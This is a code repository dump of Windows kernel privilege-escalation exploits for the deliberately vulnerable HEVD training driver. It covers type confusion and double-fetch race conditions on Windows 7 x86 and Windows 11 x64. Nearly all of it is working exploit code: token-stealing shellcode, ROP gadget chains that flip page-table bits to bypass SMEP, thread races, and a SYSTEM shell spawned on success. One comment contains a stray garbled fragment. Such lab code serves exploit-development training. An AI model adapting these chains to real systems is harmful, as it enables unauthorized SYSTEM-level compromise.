return -1; 169 | } 170 | printf("[*] Successfully created allocation: 0x%p\n", lpvAllocation); 171 | 172 | /* Trigger the Type Confusion by overwriting the function pointer */ 173 | UserTypeConfusionObject.ObjectId = 0x4242424242424242; 174 | UserTypeConfusionObject.ObjectType = (uint64_t)lpvNtKrnl + 0x28d700; // mov esp, 0x48000000 ; add esp, 0x28 ; ret 175 | 176 | /* Let the Kernel breathe... this is needed to avoid a crash, my thoery is 177 | if we don't do this the allocation will not be mapped properly. So what 178 | we need to do is sleep for a few seconds to allow this to happen! First 179 | time trying this I was under the impression VirtualLock was needed, but 180 | when testing it never locked? So after debugging I found this to be the 181 | solution. This exploit succeded 9/10 times vs the original 2/10 ;D */ 182 | printf("[*] Letting the kernel breathe"); 183 | for (int i = 0; i < 4; i++) { 184 | putchar('.'); 185 | Sleep(1000); 186 | } 187 | putchar('\n'); 188 | 189 | /* Fill the page before the target region with random data */ 190 | RtlFillMemory(lpvAllocation, 0x1000, 'A'); 191 | 192 | /* Write the gadget chain at the location we return */ 193 | WriteGadgets(lpvNtKrnl, (lpvAllocTarget + 0x28)); 194 | 195 | printf("[*] Triggering Type Confusion\n"); 196 | DeviceIoControl(hHEVD, 197 | TYPE_CONFUSION, 198 | &UserTypeConfusionObject, 199 | sizeof(UserTypeConfusionObject), 200 | NULL, 201 | 0x00, 202 | &dwBytesReturned, 203 | NULL); 204 | 205 | return CheckWin(); 206 | } 207 | 208 | int main() 209 | { 210 | HANDLE hHEVD = NULL; 211 | 212 | hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 213 | (GENERIC_READ | GENERIC_WRITE), 214 | 0x00, 215 | NULL, 216 | OPEN_EXISTING, 217 | FILE_ATTRIBUTE_NORMAL, 218 | NULL); 219 | 220 | if (hHEVD == INVALID_HANDLE_VALUE) 221 | { 222 | printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n"); 223 | return -1; 224 | } 225 | 226 | if (Exploit(hHEVD) == 0) { 227 | printf("[+] Exploitation successful, enjoy the shell!!\n\n"); 228 | system("cmd.exe"); 229 | } else { 230 | printf("[*] Exploitation failed, run again\n"); 231 | } 232 | 233 | if (hHEVD != NULL) 234 | CloseHandle(hHEVD); 235 | 236 | return 0; 237 | } 238 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x04 - Type Confusion/Windows 7 (x86)/makefile: -------------------------------------------------------------------------------- 1 | all: poc.exe struct_size 2 | 3 | poc.exe: poc.c 4 | i686-w64-mingw32-gcc poc.c -o poc.exe 5 | struct_size: struct_size.c 6 | gcc -m32 struct_size.c -o struct_size 7 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x04 - Type Confusion/Windows 7 (x86)/poc.c: -------------------------------------------------------------------------------- 1 | /* wetw0rk */ 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | #define IOCTL(Function) CTL_CODE (FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS) 15 | 16 | #define HEVD_IOCTL_TYPE_CONFUSION IOCTL(0x808) 17 | 18 | /* Structure used by Type Confusion */ 19 | typedef struct _USER_TYPE_CONFUSION_OBJECT 20 | { 21 | ULONG_PTR ObjectID; 22 | ULONG_PTR ObjectType; 23 | } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT; 24 | 25 | /* CheckWin(): 26 | Simple function to check if we're running as SYSTEM */ 27 | int CheckWin(VOID) 28 | { 29 | DWORD win = 0; 30 | DWORD dwLen = 0; 31 | CHAR *cUsername = NULL; 32 | 33 | GetUserNameA(NULL, &dwLen); 34 | 35 | if (dwLen > 0) { 36 | cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR)); 37 | } else { 38 | printf("[-] Failed to allocate buffer for username check\n"); 39 | return -1; 40 | } 41 | 42 | GetUserNameA(cUsername, &dwLen); 43 | 44 | win = strcmp(cUsername, "SYSTEM"); 45 | free(cUsername); 46 | 47 | return (win == 0) ? win : -1; 48 | } 49 | 50 | /* Exploit(): 51 | Type Confusion */ 52 | int Exploit(HANDLE hHEVD) 53 | { 54 | USER_TYPE_CONFUSION_OBJECT UserTypeConfusionObject = { 0 }; 55 | DWORD dwBytesReturned = 0; 56 | LPVOID lpvMemoryAllocation = NULL; 57 | 58 | char shellcode[]= 59 | 60 | /* sickle-tool -p windows/x86/kernel_token_stealer -f c -m pinpoint */ 61 | "\x60" // pushal 62 | "\x31\xc0" // xor eax, eax 63 | "\x64\x8b\x80\x24\x01\x00\x00" // mov eax, dword ptr fs:[eax + 0x124] 64 | "\x8b\x40\x50" // mov eax, dword ptr [eax + 0x50] 65 | "\x89\xc1" // mov ecx, eax 66 | "\xba\x04\x00\x00\x00" // mov edx, 4 67 | "\x8b\x80\xb8\x00\x00\x00" // mov eax, dword ptr [eax + 0xb8] 68 | "\x2d\xb8\x00\x00\x00" // sub eax, 0xb8 69 | "\x39\x90\xb4\x00\x00\x00" // cmp dword ptr [eax + 0xb4], edx 70 | "\x75\xed" // jne 0x1014 71 | "\x8b\x90\xf8\x00\x00\x00" // mov edx, dword ptr [eax + 0xf8] 72 | "\x89\x91\xf8\x00\x00\x00" // mov dword ptr [ecx + 0xf8], edx 73 | "\x61" // popal 74 | 75 | /* Return to Userland */ 76 | "\xc3"; // ret 77 | 78 | lpvMemoryAllocation = VirtualAlloc(NULL, 79 | 53, 80 | (MEM_COMMIT | MEM_RESERVE), 81 | PAGE_EXECUTE_READWRITE); 82 | if (lpvMemoryAllocation == NULL) 83 | { 84 | printf("[*] Failed to allocate memory for shellcode\n"); 85 | } 86 | 87 | printf("[*] Allocated memory for shellcode, shellocode @{0x%p}\n", lpvMemoryAllocation); 88 | memcpy(lpvMemoryAllocation, shellcode, 53); 89 | 90 | UserTypeConfusionObject.ObjectType = (ULONG)lpvMemoryAllocation; 91 | UserTypeConfusionObject.ObjectID = 0x41414141; 92 | 93 | printf("[*] Triggering type confusion\n"); 94 | DeviceIoControl(hHEVD, 95 | HEVD_IOCTL_TYPE_CONFUSION, 96 | &UserTypeConfusionObject, 97 | sizeof(UserTypeConfusionObject), 98 | NULL, 99 | 0x00, 100 | &dwBytesReturned, 101 | NULL); 102 | 103 | return CheckWin(); 104 | } 105 | 106 | int main() 107 | { 108 | HANDLE hHEVD = NULL; 109 | hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 110 | (GENERIC_READ | GENERIC_WRITE), 111 | 0x00, 112 | NULL, 113 | OPEN_EXISTING, 114 | FILE_ATTRIBUTE_NORMAL, 115 | NULL); 116 | 117 | if (hHEVD == NULL) 118 | { 119 | printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n"); 120 | return -1; 121 | } 122 | 123 | if (Exploit(hHEVD) == 0) { 124 | printf("[*] Exploitation successful, enjoy de shell!!\n\n"); 125 | system("cmd.exe"); 126 | } else { 127 | printf("[-] Exploitation failed, run again\n"); 128 | } 129 | 130 | if (hHEVD != INVALID_HANDLE_VALUE) { 131 | CloseHandle(hHEVD); 132 | } 133 | } 134 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x04 - Type Confusion/Windows 7 (x86)/struct_size.c: -------------------------------------------------------------------------------- 1 | /* wetw0rk */ 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | /* 8 | 62 typedef struct _USER_TYPE_CONFUSION_OBJECT 9 | 63 { 10 | 64 ULONG_PTR ObjectID; 11 | 65 ULONG_PTR ObjectType; 12 | 66 } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT; 13 | 67 14 | 68 #pragma warning(push) 15 | 69 #pragma warning(disable : 4201) 16 | 70 typedef struct _KERNEL_TYPE_CONFUSION_OBJECT 17 | 71 { 18 | 72 ULONG_PTR ObjectID; 19 | 73 union 20 | 74 { 21 | 75 ULONG_PTR ObjectType; 22 | 76 FunctionPointer Callback; 23 | 77 }; 24 | 78 } KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT; 25 | */ 26 | 27 | typedef struct _USER_TYPE_CONFUSION_OBJECT 28 | { 29 | // ULONG_PTR is 32bit in size for x86 so lets force it 30 | uint32_t *ObjectId; 31 | uint32_t *ObjectType; 32 | } USER_TYPE_CONFUSION_OBJECT; 33 | 34 | typedef struct _KERNEL_TYPE_CONFUSION_OBJECT 35 | { 36 | uint32_t *ObjectId; 37 | union 38 | { 39 | uint32_t *ObjectType; 40 | void(*func)(); 41 | }; 42 | } KERNEL_TYPE_CONFUSION_OBJECT; 43 | 44 | int main() 45 | { 46 | printf("Sizeof USER_TYPE_CONFUSION_OBJECT : %d\n", sizeof(USER_TYPE_CONFUSION_OBJECT)); 47 | printf("Sizeof KERNEL_TYPE_CONFUSION_OBJECT : %d\n", sizeof(KERNEL_TYPE_CONFUSION_OBJECT)); 48 | } 49 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x05 - Race Condition (Double Fetch)/Windows 11 (x64)/makefile: -------------------------------------------------------------------------------- 1 | poc.exe: poc.c 2 | x86_64-w64-mingw32-gcc poc.c -o poc.exe 3 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x05 - Race Condition (Double Fetch)/Windows 11 (x64)/poc.c: -------------------------------------------------------------------------------- 1 | /* wetw0rk */ 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | /* IOCTL */ 16 | #define DOUBLE_FETCH_IOCTL 0x222037 17 | 18 | /* Max threads */ 19 | #define NUM_THREADS 5 // 10 20 | 21 | /* Exploit Buffer */ 22 | #define BUFFER 0x900 23 | #define RETOVR 2064 24 | 25 | /* Structure used by Double Fetch */ 26 | typedef struct _DOUBLE_FETCH 27 | { 28 | void * Buffer; 29 | uint64_t Size; 30 | } DOUBLE_FETCH, *PDOUBLE_FETCH; 31 | 32 | /* Structure for threads */ 33 | typedef struct _IRP_ARGS 34 | { 35 | HANDLE hHEVD; 36 | PDOUBLE_FETCH pDoubleFetch; 37 | } IRP_ARGS, *PIRP_ARGS; 38 | 39 | /* GetKernelModuleBase(): 40 | Function used to obtain kernel module address */ 41 | LPVOID GetKernelModuleBase(PCHAR pKernelModule) 42 | { 43 | char pcDriver[1024] = { 0 }; 44 | LPVOID lpvTargetDriver = NULL; 45 | LPVOID *lpvDrivers = NULL; 46 | DWORD dwCB = 0; 47 | DWORD dwDrivers = 0; 48 | DWORD i = 0; 49 | 50 | EnumDeviceDrivers(NULL, dwCB, &dwCB); 51 | if (dwCB <= 0) 52 | return NULL; 53 | 54 | lpvDrivers = (LPVOID *)malloc(dwCB * sizeof(LPVOID)); 55 | if (lpvDrivers == NULL) 56 | return NULL; 57 | 58 | if (EnumDeviceDrivers(lpvDrivers, dwCB, &dwCB)) 59 | { 60 | dwDrivers = dwCB / sizeof(LPVOID); 61 | for (i = 0; i < dwDrivers; i++) 62 | if (GetDeviceDriverBaseNameA(lpvDrivers[i], pcDriver, sizeof(pcDriver))) 63 | if (StrStrA(pcDriver, pKernelModule) != NULL) 64 | lpvTargetDriver = lpvDrivers[i]; 65 | } 66 | 67 | free(lpvDrivers); 68 | 69 | return lpvTargetDriver; 70 | } 71 | 72 | /* CheckWin(): 73 | Simple function to check if we're running as SYSTEM */ 74 | int CheckWin(VOID) 75 | { 76 | DWORD win = 0; 77 | DWORD dwLen = 0; 78 | CHAR *cUsername = NULL; 79 | 80 | GetUserNameA(NULL, &dwLen); 81 | 82 | if (dwLen > 0) { 83 | cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR)); 84 | } else { 85 | printf("[-] Failed to allocate buffer for username check\n"); 86 | return -1; 87 | } 88 | 89 | GetUserNameA(cUsername, &dwLen); 90 | 91 | win = strcmp(cUsername, "SYSTEM"); 92 | free(cUsername); 93 | 94 | return (win == 0) ? win : -1; 95 | } 96 | 97 | /* TriggerRaceCondition(): 98 | Since driver reads from userland twice we can overwrite the existing condition that bypasses the checkslmgr -rearm 99 | at runtime. If we win the race we successfully trigger a buffer overflow! */ 100 | DWORD WINAPI TriggerRaceCondition(LPVOID lpParameters) 101 | { 102 | PIRP_ARGS pIrpArgs = (PIRP_ARGS)lpParameters; 103 | 104 | while (1) { 105 | pIrpArgs->pDoubleFetch->Size = BUFFER; 106 | } 107 | 108 | return 0; 109 | } 110 | 111 | /* TriggerWorkingCondition(): 112 | As we saw in TriggerDoubleFetch() in order to reach the RtlCopyMemory() aka wrapper for memcpy() we need 113 | our buffer to be under the sizeof(KernelBuffer). This function sends an IOCTL to ensure we meed that 114 | condition. */ 115 | DWORD WINAPI TriggerWorkingCondition(LPVOID lpParameters) 116 | { 117 | DWORD dwBytesReturned = 0; 118 | PIRP_ARGS pIrpArgs = (PIRP_ARGS)lpParameters; 119 | 120 | printf("\t[!] Racing!!! Spraying Object(s): %p, Size: 0x%x\n", pIrpArgs->pDoubleFetch, 121 | pIrpArgs->pDoubleFetch->Size); 122 | while (1) 123 | { 124 | pIrpArgs->pDoubleFetch->Size = 0x10; 125 | 126 | DeviceIoControl(pIrpArgs->hHEVD, 127 | DOUBLE_FETCH_IOCTL, 128 | pIrpArgs->pDoubleFetch, 129 | sizeof(DOUBLE_FETCH), 130 | NULL, 131 | 0x00, 132 | &dwBytesReturned, 133 | NULL); 134 | } 135 | 136 | return 0; 137 | } 138 | 139 | /* GenerateExploitBuffer(): 140 | Generate the buffer that will overwrite the return address and grant control over the instruction pointer. */ 141 | DWORD GenerateExploitBuffer(LPVOID lpvNt, LPVOID lpvBuffer) 142 | { 143 | DWORD i = 0; 144 | LPVOID lpvShellcode = NULL; 145 | uint64_t nt = (uint64_t)(lpvNt); 146 | uint64_t *payload = (uint64_t *)(lpvBuffer); 147 | 148 | uint8_t sc[129] = { 149 | // sickle-tool -p windows/x64/kernel_token_stealer -f num (58 bytes) 150 | 0x65, 0x48, 0xa1, 0x88, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 151 | 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xb2, 0x04, 0x48, 0x8b, 0x80, 0x48, 0x04, 152 | 0x00, 0x00, 0x48, 0x2d, 0x48, 0x04, 0x00, 0x00, 0x38, 0x90, 0x40, 0x04, 0x00, 0x00, 153 | 0x75, 0xeb, 0x48, 0x8b, 0x90, 0xb8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x91, 0xb8, 0x04, 154 | 0x00, 0x00, 155 | 156 | // sickle-tool -p windows/x64/kernel_sysret -f num (71) 157 | 0x65, 0x48, 0xa1, 0x88, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x66, 0x8b, 0x88, 158 | 0xe4, 0x01, 0x00, 0x00, 0x66, 0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 159 | 0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00, 160 | 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 161 | 0x48, 0x8b, 0xaa, 0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48, 0x0f, 162 | 0x07 }; 163 | 164 | lpvShellcode = VirtualAlloc(NULL, 129, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 165 | if (lpvShellcode == NULL) 166 | { 167 | printf("[-] Failed to allocate memory to house shellcode\n"); 168 | return -1; 169 | } 170 | 171 | RtlCopyMemory(lpvShellcode, sc, 129); 172 | 173 | for (i = 0; i < (RETOVR / sizeof(uint64_t)); i++) { 174 | *payload++ = nt + 0xa4ea7d; // ret 175 | } 176 | 177 | /* Prepare RDX register for later. This is needed for the XOR operation */ 178 | *payload++ = nt + 0x40ed4e; // pop rdx ; pop rax ; pop rcx ; ret 179 | *payload++ = 0x000008; // Set RDX to 0x08, we will need this to accomplish the XOR 180 | *payload++ = 0x000000; // [filler] 181 | *payload++ = 0x000000; // [filler] 182 | 183 | /* Setup the call to MiGetPteAddress in order to get the address of the PTE for our 184 | userland code. The setup is as follows: 185 | 186 | RAX -> VOID *MiGetPteAddress( 187 | ( RCX == PTE / Userland Code ) 188 | ); 189 | 190 | Once the call is complete RAX should contain the pointer to our PTE. */ 191 | *payload++ = nt + 0x57699c; // pop rcx ; ret 192 | *payload++ = (uint64_t)lpvShellcode; // *shellcode 193 | *payload++ = nt + 0x24aaec; // MiGetPteAddress() 194 | 195 | /* Now that we have obtained the PTE address, we can modify the 2nd bit in order to 196 | mark the page as a kernel page (U -> K). We can do this using XOR ;) */ 197 | *payload++ = nt + 0x30fcf3; // sub rax, rdx ; ret 198 | *payload++ = nt + 0x54f344; // push rax ; pop rbx ; ret 199 | *payload++ = nt + 0x40ed4e; // pop rdx ; pop rax ; pop rcx ; ret 200 | *payload++ = 0x000004; // 0x40ed4e: pop rdx ; pop rax ; pop rcx ; ret ; (1 found) 201 | *payload++ = 0x000000; // [filler] 202 | *payload++ = 0x000000; // [filler] 203 | *payload++ = nt + 0x3788b6; // xor [rbx+0x08], edx ; mov rbx, qword [rsp+0x60] ; add rsp, 0x40 ; pop r14 ; pop rdi ; pop rbp ; ret 204 | 205 | /* Now we cam spray our shellcode address since SMEP and VPS should be bypassed */ 206 | for (i = 0; i < 0xC; i++) { 207 | *payload++ = (uint64_t)lpvShellcode; 208 | } 209 | } 210 | 211 | /* Exploit(): 212 | Double Fetch */ 213 | int Exploit(HANDLE hHEVD) 214 | { 215 | LPVOID lpvNtKrnl = NULL; 216 | LPVOID lpvMemoryAllocation = NULL; 217 | HANDLE hThreadWork[NUM_THREADS] = { 0 }; 218 | HANDLE hThreadRace[NUM_THREADS] = { 0 }; 219 | PIRP_ARGS pIrpArgs = (PIRP_ARGS)malloc(sizeof(IRP_ARGS)); 220 | PDOUBLE_FETCH pDoubleFetchObject = (PDOUBLE_FETCH)malloc(sizeof(DOUBLE_FETCH)); 221 | 222 | lpvMemoryAllocation = VirtualAlloc(NULL, 223 | BUFFER, 224 | (MEM_COMMIT | MEM_RESERVE), 225 | PAGE_EXECUTE_READWRITE); 226 | 227 | if (lpvMemoryAllocation == NULL) 228 | { 229 | printf("[-] Failed to allocate exploitation buffer\n"); 230 | return -1; 231 | } 232 | 233 | printf("[*] Successfully allocated exploitation buffer\n"); 234 | 235 | /* You already know ;) */ 236 | lpvNtKrnl = GetKernelModuleBase("ntoskrnl"); 237 | if (lpvNtKrnl == NULL) 238 | { 239 | printf("[-] Failed to obtain the base address of nt\n"); 240 | return -1; 241 | } 242 | printf("[*] Obtained the base address of nt: 0x%p\n", lpvNtKrnl); 243 | 244 | /* Fill up the buffer */ 245 | GenerateExploitBuffer(lpvNtKrnl, lpvMemoryAllocation); 246 | 247 | /* Setup the Double Fetch object */ 248 | pDoubleFetchObject->Buffer = lpvMemoryAllocation; 249 | pDoubleFetchObject->Size = 0; 250 | 251 | /* Setup the base IRP argument(s) */ 252 | pIrpArgs->hHEVD = hHEVD; 253 | pIrpArgs->pDoubleFetch = pDoubleFetchObject; 254 | 255 | /* Start the race!! */ 256 | printf("[*] Viol, Opr, Conspiracy Origins\n"); 257 | for (int i = 0; i < NUM_THREADS; i++) 258 | { 259 | hThreadWork[i] = CreateThread(NULL, 0, TriggerWorkingCondition, pIrpArgs, 0, NULL); 260 | hThreadRace[i] = CreateThread(NULL, 0, TriggerRaceCondition, pIrpArgs, 0, NULL); 261 | } 262 | 263 | WaitForMultipleObjects(NUM_THREADS, hThreadWork, TRUE, 10000); 264 | 265 | for (int i = 0; i < NUM_THREADS; i++) 266 | { 267 | TerminateThread(hThreadWork[i], 0); 268 | CloseHandle(hThreadWork[i]); 269 | 270 | TerminateThread(hThreadRace[i], 0); 271 | CloseHandle(hThreadRace[i]); 272 | } 273 | 274 | return CheckWin(); 275 | } 276 | 277 | int main() 278 | { 279 | HANDLE hHEVD = NULL; 280 | hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 281 | (GENERIC_READ | GENERIC_WRITE), 282 | 0x00, 283 | NULL, 284 | OPEN_EXISTING, 285 | FILE_ATTRIBUTE_NORMAL, 286 | NULL); 287 | 288 | if (hHEVD == NULL) 289 | { 290 | printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n"); 291 | return -1; 292 | } 293 | 294 | if (Exploit(hHEVD) == 0) { 295 | printf("[*] We won the race!!! Enjoy de shell!!\n\n"); 296 | system("cmd.exe"); 297 | } else { 298 | printf("[-] Exploitation failed, run again\n"); 299 | } 300 | 301 | if (hHEVD != INVALID_HANDLE_VALUE) { 302 | CloseHandle(hHEVD); 303 | } 304 | } 305 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x05 - Race Condition (Double Fetch)/Windows 7 (x86)/makefile: -------------------------------------------------------------------------------- 1 | poc.exe: poc.c 2 | i686-w64-mingw32-gcc poc.c -o poc.exe 3 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x05 - Race Condition (Double Fetch)/Windows 7 (x86)/poc.c: -------------------------------------------------------------------------------- 1 | /* wetw0rk */ 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | #define IOCTL(Function) CTL_CODE (FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS) 16 | 17 | #define HEVD_IOCTL_DOUBLE_FETCH IOCTL(0x80D) 18 | 19 | /* Structure used by Double Fetch */ 20 | typedef struct _DOUBLE_FETCH 21 | { 22 | PVOID Buffer; 23 | SIZE_T Size; 24 | } DOUBLE_FETCH, *PDOUBLE_FETCH; 25 | 26 | /* Structure for threads */ 27 | typedef struct _IRP_ARGS 28 | { 29 | HANDLE hHEVD; 30 | PDOUBLE_FETCH pDoubleFetch; 31 | } IRP_ARGS, *PIRP_ARGS; 32 | 33 | /* Max threads */ 34 | #define NUM_THREADS 5 35 | 36 | /* Exploit Buffer */ 37 | #define BUFFER 2084 38 | 39 | /* CheckWin(): 40 | Simple function to check if we're running as SYSTEM */ 41 | int CheckWin(VOID) 42 | { 43 | DWORD win = 0; 44 | DWORD dwLen = 0; 45 | CHAR *cUsername = NULL; 46 | 47 | GetUserNameA(NULL, &dwLen); 48 | 49 | if (dwLen > 0) { 50 | cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR)); 51 | } else { 52 | printf("[-] Failed to allocate buffer for username check\n"); 53 | return -1; 54 | } 55 | 56 | GetUserNameA(cUsername, &dwLen); 57 | 58 | win = strcmp(cUsername, "SYSTEM"); 59 | free(cUsername); 60 | 61 | return (win == 0) ? win : -1; 62 | } 63 | 64 | /* TriggerRaceCondition(): 65 | Since driver reads from userland twice we can overwrite the existing condition that bypasses the check 66 | at runtime. If we win the race we successfully trigger a buffer overflow! */ 67 | DWORD WINAPI TriggerRaceCondition(LPVOID lpParameters) 68 | { 69 | PIRP_ARGS pIrpArgs = (PIRP_ARGS)lpParameters; 70 | 71 | while (1) { 72 | pIrpArgs->pDoubleFetch->Size = BUFFER; 73 | } 74 | 75 | return 0; 76 | } 77 | 78 | /* TriggerWorkingCondition(): 79 | As we saw in TriggerDoubleFetch() in order to reach the RtlCopyMemory() aka wrapper for memcpy() we need 80 | our buffer to be under the sizeof(KernelBuffer). This function sends an IOCTL to ensure we meed that 81 | condition. */ 82 | DWORD WINAPI TriggerWorkingCondition(LPVOID lpParameters) 83 | { 84 | DWORD dwBytesReturned = 0; 85 | PIRP_ARGS pIrpArgs = (PIRP_ARGS)lpParameters; 86 | 87 | printf("\t[*] Spraying DoubleFetchObject(s): %p, Size: 0x%x\n", pIrpArgs->pDoubleFetch, 88 | pIrpArgs->pDoubleFetch->Size); 89 | while (1) 90 | { 91 | pIrpArgs->pDoubleFetch->Size = 0x10; 92 | 93 | DeviceIoControl(pIrpArgs->hHEVD, 94 | HEVD_IOCTL_DOUBLE_FETCH, 95 | pIrpArgs->pDoubleFetch, 96 | sizeof(DOUBLE_FETCH), 97 | NULL, 98 | 0x00, 99 | &dwBytesReturned, 100 | NULL); 101 | } 102 | 103 | return 0; 104 | } 105 | 106 | /* GenerateExploitBuffer(): 107 | Generate the buffer that will overwrite the return address and grant control over the instruction pointer. */ 108 | DWORD GenerateExploitBuffer(LPVOID lpvBuffer) 109 | { 110 | uint32_t *payload = (uint32_t *)(lpvBuffer); 111 | LPVOID lpvShellcode = NULL; 112 | 113 | char shellcode[]= 114 | // sickle-tool -p windows/x86/kernel_token_stealer -f c -m pinpoint 115 | "\x60" // pushal 116 | "\x31\xc0" // xor eax, eax 117 | "\x64\x8b\x80\x24\x01\x00\x00" // mov eax, dword ptr fs:[eax + 0x124] 118 | "\x8b\x40\x50" // mov eax, dword ptr [eax + 0x50] 119 | "\x89\xc1" // mov ecx, eax 120 | "\xba\x04\x00\x00\x00" // mov edx, 4 121 | "\x8b\x80\xb8\x00\x00\x00" // mov eax, dword ptr [eax + 0xb8] 122 | "\x2d\xb8\x00\x00\x00" // sub eax, 0xb8 123 | "\x39\x90\xb4\x00\x00\x00" // cmp dword ptr [eax + 0xb4], edx 124 | "\x75\xed" // jne 0x1014 125 | "\x8b\x90\xf8\x00\x00\x00" // mov edx, dword ptr [eax + 0xf8] 126 | "\x89\x91\xf8\x00\x00\x00" // mov dword ptr [ecx + 0xf8], edx 127 | "\x61" // popal 128 | 129 | /* RETURN CODE */ 130 | "\x5d" // POP EBP 131 | "\xc2\x08\x00"; // RET 0x08 132 | 133 | lpvShellcode = VirtualAlloc(NULL, 57, (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE); 134 | if (lpvShellcode == NULL) { 135 | printf("[-] Failed to generate shellcode allocation\n"); 136 | return -1; 137 | } 138 | 139 | printf("[*] Copying shellcode to allocated memory region\n"); 140 | memcpy(lpvShellcode, shellcode, 57); 141 | 142 | for (int i = 0; i < (BUFFER / sizeof(uint32_t)); i++) 143 | { 144 | *payload++ = (uint32_t)lpvShellcode; 145 | } 146 | 147 | return 0; 148 | } 149 | 150 | /* Exploit(): 151 | Double Fetch */ 152 | DWORD Exploit(HANDLE hHEVD) 153 | { 154 | LPVOID lpvMemoryAllocation = NULL; 155 | HANDLE hThreadWork[NUM_THREADS] = { 0 }; 156 | HANDLE hThreadRace[NUM_THREADS] = { 0 }; 157 | PIRP_ARGS pIrpArgs = (PIRP_ARGS)malloc(sizeof(IRP_ARGS)); 158 | PDOUBLE_FETCH pDoubleFetchObject = (PDOUBLE_FETCH)malloc(sizeof(DOUBLE_FETCH)); 159 | 160 | lpvMemoryAllocation = VirtualAlloc(NULL, 161 | BUFFER, 162 | (MEM_COMMIT | MEM_RESERVE), 163 | PAGE_EXECUTE_READWRITE); 164 | 165 | /* Fill up the buffer */ 166 | printf("[*] Successfully allocated exploitation buffer\n"); 167 | if (GenerateExploitBuffer(lpvMemoryAllocation) == -1) { 168 | return -1; 169 | } 170 | 171 | /* Setup the Double Fetch object */ 172 | pDoubleFetchObject->Buffer = lpvMemoryAllocation; 173 | pDoubleFetchObject->Size = 0; 174 | 175 | /* Setup the base IRP argument(s) */ 176 | pIrpArgs->hHEVD = hHEVD; 177 | pIrpArgs->pDoubleFetch = pDoubleFetchObject; 178 | 179 | /* Start the race!! */ 180 | printf("[*] Off to the races\n"); 181 | for (int i = 0; i < NUM_THREADS; i++) 182 | { 183 | hThreadWork[i] = CreateThread(NULL, 0, TriggerWorkingCondition, pIrpArgs, 0, NULL); 184 | hThreadRace[i] = CreateThread(NULL, 0, TriggerRaceCondition, pIrpArgs, 0, NULL); 185 | } 186 | 187 | WaitForMultipleObjects(NUM_THREADS, hThreadWork, TRUE, 1000); 188 | 189 | for (int i = 0; i < NUM_THREADS; i++) 190 | { 191 | TerminateThread(hThreadWork[i], 0); 192 | CloseHandle(hThreadWork[i]); 193 | 194 | TerminateThread(hThreadRace[i], 0); 195 | CloseHandle(hThreadRace[i]); 196 | } 197 | 198 | return CheckWin(); 199 | } 200 | 201 | int main() 202 | { 203 | HANDLE hHEVD = NULL; 204 | hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 205 | (GENERIC_READ | GENERIC_WRITE), 206 | 0x00, 207 | NULL, 208 | OPEN_EXISTING, 209 | FILE_ATTRIBUTE_NORMAL, 210 | NULL); 211 | 212 | if (hHEVD == NULL) 213 | { 214 | printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n"); 215 | return -1; 216 | } 217 | 218 | if (Exploit(hHEVD) == 0) { 219 | printf("[*] Exploitation successful, enjoy de shell!!\n\n"); 220 | system("cmd.exe"); 221 | } else { 222 | printf("[-] Exploitation failed, run again\n"); 223 | } 224 | 225 | if (hHEVD != INVALID_HANDLE_VALUE) { 226 | CloseHandle(hHEVD); 227 | } 228 | } 229 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x06 - Stack Overflow (GS)/Windows 11 (x64)/makefile: -------------------------------------------------------------------------------- 1 | poc.exe: poc.c 2 | x86_64-w64-mingw32-gcc poc.c -o poc.exe 3 | -------------------------------------------------------------------------------- /HEVD-Exploits/0x06 - Stack Overflow (GS)/Windows 11 (x64)/poc.c: -------------------------------------------------------------------------------- 1 | /* wetw0rk */ 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include 10 | #include 11 | #include 12 | 13 | typedef LONG KPRIORITY; 14 | 15 | typedef struct _CLIENT_ID { 16 | DWORD UniqueProcess; 17 | DWORD UniqueThread; 18 | } CLIENT_ID; 19 | 